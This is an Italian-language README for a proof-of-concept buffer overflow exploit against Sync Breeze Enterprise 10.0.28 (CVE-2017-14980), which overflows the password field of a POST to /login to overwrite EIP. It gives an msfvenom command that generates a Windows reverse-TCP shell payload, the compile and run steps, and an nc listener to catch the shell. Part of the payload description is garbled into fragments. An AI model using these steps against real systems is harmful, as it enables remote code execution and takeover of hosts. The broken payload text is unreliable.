
Exploit proof-of-concept di buffer overflow per Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Invia un payload HTTP POST appositamente creato per sovrascrivere EIP ed eseguire shellcode x86 personalizzato per l'esecuzione di codice arbitrario.
Questa repository contiene un proof-of-concept exploit di buffer overflow (BOF) per Sync Breeze Enterprise versione 10.0.28, che sfrutta la vulnerabilità identificata come CVE-2017-14980.
La vulnerabilità è dovuta a una non corretta validazione dell'input durante l'elaborazione del campo password in una richiesta POST all'endpoint /login.
Un attaccante può inviare un valore eccessivamente lungo in questo campo, che sovrascrive l'EIP e consente l'esecuzione di codice arbitrario.
Questo exploit invia un payload appositamente costruito composto da:
'A')password.gcc)\x83\x0C\x09\x10) e dello shellcode se necessarioEsempio di generazione dello shellcode con msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444